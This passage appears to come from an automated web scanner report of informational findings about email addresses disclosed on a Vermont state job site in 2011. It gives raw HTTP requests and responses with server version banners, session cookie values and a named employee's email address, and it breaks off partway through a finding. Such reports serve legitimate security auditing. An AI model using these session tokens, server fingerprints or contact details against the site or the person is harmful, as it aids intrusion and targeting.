PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Date: Fri, 29 Apr 2011 21:06:55 GMT

GIF89au.D..........j...B !M.u##.]0..+<b.......333]>a.3...z.ff....R*/Y/;.i..........U5..3.[5!!!...{{{....4.s22.sss......JJJ......3lPd..rQHD{.vF......S.{CCC....o;...'Q.}JJTq.0.V..........J+r...T).|b.
...[SNIP]...

22.231. https://www.vermontjoblink.com/ada/default.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.vermontjoblink.com
Path:   /ada/default.cfm

Issue detail

The following email address was disclosed in the response:

Request

GET /ada/default.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:11:49 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Pragma: no-cache
Expires: 06 Nov 1994 08:49:37 GMT
Content-Type: text/html; charset=UTF-8
cache-control: no-cache, no-store, must-revalidate

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la
...[SNIP]...

22.232. https://www.vermontjoblink.com/ada/etp/etp_newuser_dsp.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.vermontjoblink.com
Path:   /ada/etp/etp_newuser_dsp.cfm

Issue detail

The following email address was disclosed in the response:

Request

GET /ada/etp/etp_newuser_dsp.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:11:58 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Pragma: no-cache
Expires: {ts '2011-04-29 17:11:56'}
Content-Type: text/html; charset=UTF-8
cache-control: no-cache, no-store, must-revalidate

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la
...[SNIP]...

22.233. https://www.vermontjoblink.com/ada/global/images/1p.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.vermontjoblink.com
Path:   /ada/global/images/1p.gif

Issue detail

The following email address was disclosed in the response:

Request

GET /ada/global/images/1p.gif HTTP/1.1
Host: www.vermontjoblink.com
Connection: keep-alive
Referer: https://www.vermontjoblink.com/ada/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; TEST=1; SYSTRANLANGUAGE=en

Response

HTTP/1.1 200 OK
Content-Length: 49
Content-Type: image/gif
Content-Location: https://www.vermontjoblink.com/ada/global/images/1p.gif
Last-Modified: Mon, 18 Oct 2010 13:02:54 GMT
Accept-Ranges: bytes
ETag: "013e9c6c46ecb1:ea4"
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Date: Fri, 29 Apr 2011 21:06:55 GMT

GIF89a...................!.......,...........T..;

22.234. https://www.vermontjoblink.com/ada/global/images/error.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.vermontjoblink.com
Path:   /ada/global/images/error.gif

Issue detail

The following email address was disclosed in the response:

Request

GET /ada/global/images/error.gif HTTP/1.1
Host: www.vermontjoblink.com
Connection: keep-alive
Referer: https://www.vermontjoblink.com/ada/mn_forgotpass.cfm?securitysys=on&FormID=10&rand=1902
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D

Response

HTTP/1.1 200 OK
Content-Length: 898
Content-Type: image/gif
Content-Location: https://www.vermontjoblink.com/ada/global/images/error.gif
Last-Modified: Mon, 18 Oct 2010 13:02:54 GMT
Accept-Ranges: bytes
ETag: "013e9c6c46ecb1:ea4"
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Date: Fri, 29 Apr 2011 21:07:36 GMT

GIF89a..............!!.!).11.BB..!.!).)1.19.BB.JJ.JR.RR.9B.BJ.kk.ss.......s{............................................................................................................................
...[SNIP]...

22.235. https://www.vermontjoblink.com/ada/global/images/kswksbgd.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.vermontjoblink.com
Path:   /ada/global/images/kswksbgd.gif

Issue detail

The following email address was disclosed in the response:

Request

GET /ada/global/images/kswksbgd.gif HTTP/1.1
Host: www.vermontjoblink.com
Connection: keep-alive
Referer: https://www.vermontjoblink.com/ada/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; TEST=1; SYSTRANLANGUAGE=en

Response

HTTP/1.1 200 OK
Content-Length: 66
Content-Type: image/gif
Content-Location: https://www.vermontjoblink.com/ada/global/images/kswksbgd.gif
Last-Modified: Mon, 18 Oct 2010 13:02:54 GMT
Accept-Ranges: bytes
ETag: "013e9c6c46ecb1:ea4"
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Date: Fri, 29 Apr 2011 21:06:54 GMT

GIF89a    .    ................!.......,....    .    ....Tdx....<S..^.t..XI..;

22.236. https://www.vermontjoblink.com/ada/global/images/printericonA.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.vermontjoblink.com
Path:   /ada/global/images/printericonA.png

Issue detail

The following email address was disclosed in the response:

Request

GET /ada/global/images/printericonA.png HTTP/1.1
Host: www.vermontjoblink.com
Connection: keep-alive
Referer: https://www.vermontjoblink.com/ada/works/Login.cfm
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D

Response

HTTP/1.1 200 OK
Content-Length: 167
Content-Type: image/png
Content-Location: https://www.vermontjoblink.com/ada/global/images/printericonA.png
Last-Modified: Mon, 18 Oct 2010 13:02:54 GMT
Accept-Ranges: bytes
ETag: "013e9c6c46ecb1:ea4"
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Date: Fri, 29 Apr 2011 21:08:05 GMT

.PNG
.
...IHDR.............a.~e....tEXtSoftware.Adobe ImageReadyq.e<...    PLTE.........s<
....4IDATx.b`...@...`B...!..z.b.....h..!L.A6#).....jx....,..s.i......IEND.B`.

22.237. https://www.vermontjoblink.com/ada/global/spellchecker/googiespell/AJS.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.vermontjoblink.com
Path:   /ada/global/spellchecker/googiespell/AJS.js

Issue detail

The following email addresses were disclosed in the response:

Request

GET /ada/global/spellchecker/googiespell/AJS.js HTTP/1.1
Host: www.vermontjoblink.com
Connection: keep-alive
Referer: https://www.vermontjoblink.com/ada/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; TEST=1; SYSTRANLANGUAGE=en

Response

HTTP/1.1 200 OK
Content-Length: 41910
Content-Type: application/x-javascript
Content-Location: https://www.vermontjoblink.com/ada/global/spellchecker/googiespell/AJS.js
Last-Modified: Mon, 18 Oct 2010 13:02:48 GMT
Accept-Ranges: bytes
ETag: "08c55c3c46ecb1:ea4"
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Date: Fri, 29 Apr 2011 21:06:51 GMT

/*
Last Modified: 29/04/07 18:44:48

AJS JavaScript library
A very small library with a lot of functionality
AUTHOR
4mir Salihefendic (http://amix.dk) - amix@amix.dk
LICENSE
Copyright (c) 2006 Amir Salihefendic. All rights reserved.
Copyright (c) 2005 Bob Ippolito. All rights reserved.
http://www.opensource.org/licenses/mit-license.php
VERSION

...[SNIP]...

22.238. https://www.vermontjoblink.com/ada/global/spellchecker/googiespell/cookiesupport.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.vermontjoblink.com
Path:   /ada/global/spellchecker/googiespell/cookiesupport.js

Issue detail

The following email address was disclosed in the response:

Request

GET /ada/global/spellchecker/googiespell/cookiesupport.js HTTP/1.1
Host: www.vermontjoblink.com
Connection: keep-alive
Referer: https://www.vermontjoblink.com/ada/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; TEST=1; SYSTRANLANGUAGE=en

Response

HTTP/1.1 200 OK
Content-Length: 718
Content-Type: application/x-javascript
Content-Location: https://www.vermontjoblink.com/ada/global/spellchecker/googiespell/cookiesupport.js
Last-Modified: Mon, 18 Oct 2010 13:02:48 GMT
Accept-Ranges: bytes
ETag: "08c55c3c46ecb1:ea4"
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Date: Fri, 29 Apr 2011 21:06:52 GMT

function setCookie(name, value, expires, path, domain, secure) {
var curCookie = name + "=" + escape(value) +
((expires) ? "; expires=" + expires.toGMTString() : "") +
((path) ? "; path=
...[SNIP]...

22.239. https://www.vermontjoblink.com/ada/global/spellchecker/googiespell/googiespell.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.vermontjoblink.com
Path:   /ada/global/spellchecker/googiespell/googiespell.js

Issue detail

The following email addresses were disclosed in the response:

Request

GET /ada/global/spellchecker/googiespell/googiespell.js HTTP/1.1
Host: www.vermontjoblink.com
Connection: keep-alive
Referer: https://www.vermontjoblink.com/ada/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; TEST=1; SYSTRANLANGUAGE=en

Response

HTTP/1.1 200 OK
Content-Length: 35139
Content-Type: application/x-javascript
Content-Location: https://www.vermontjoblink.com/ada/global/spellchecker/googiespell/googiespell.js
Last-Modified: Mon, 18 Oct 2010 13:02:48 GMT
Accept-Ranges: bytes
ETag: "08c55c3c46ecb1:ea4"
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Date: Fri, 29 Apr 2011 21:06:51 GMT

/****
Last Modified: 13/05/07 00:25:28

GoogieSpell
Google spell checker for your own web-apps :)
Copyright Amir Salihefendic 2006
LICENSE
GPL (see gpl.txt for more information
...[SNIP]...
rietary software!
There is another license that permits you to use this script with proprietary software. Check out:... for more info.
AUTHOR
4mir Salihefendic (http://amix.dk) - amix@amix.dk
VERSION
4.0
****/
var GOOGIE_CUR_LANG = null;
var GOOGIE_DEFAULT_LANG = "en";

function GoogieSpell(img_dir, server_url) {
var cookie_value;
var lang;
cookie_value = getCoo
...[SNIP]...

22.240. https://www.vermontjoblink.com/ada/global/style/cfmstyle.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.vermontjoblink.com
Path:   /ada/global/style/cfmstyle.css

Issue detail

The following email address was disclosed in the response:

Request

GET /ada/global/style/cfmstyle.css?appname=Vermont&maindir=/ada&cssversion=8 HTTP/1.1
Host: www.vermontjoblink.com
Connection: keep-alive
Referer: https://www.vermontjoblink.com/ada/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; TEST=1; SYSTRANLANGUAGE=en

Response

HTTP/1.1 200 OK
Connection: close
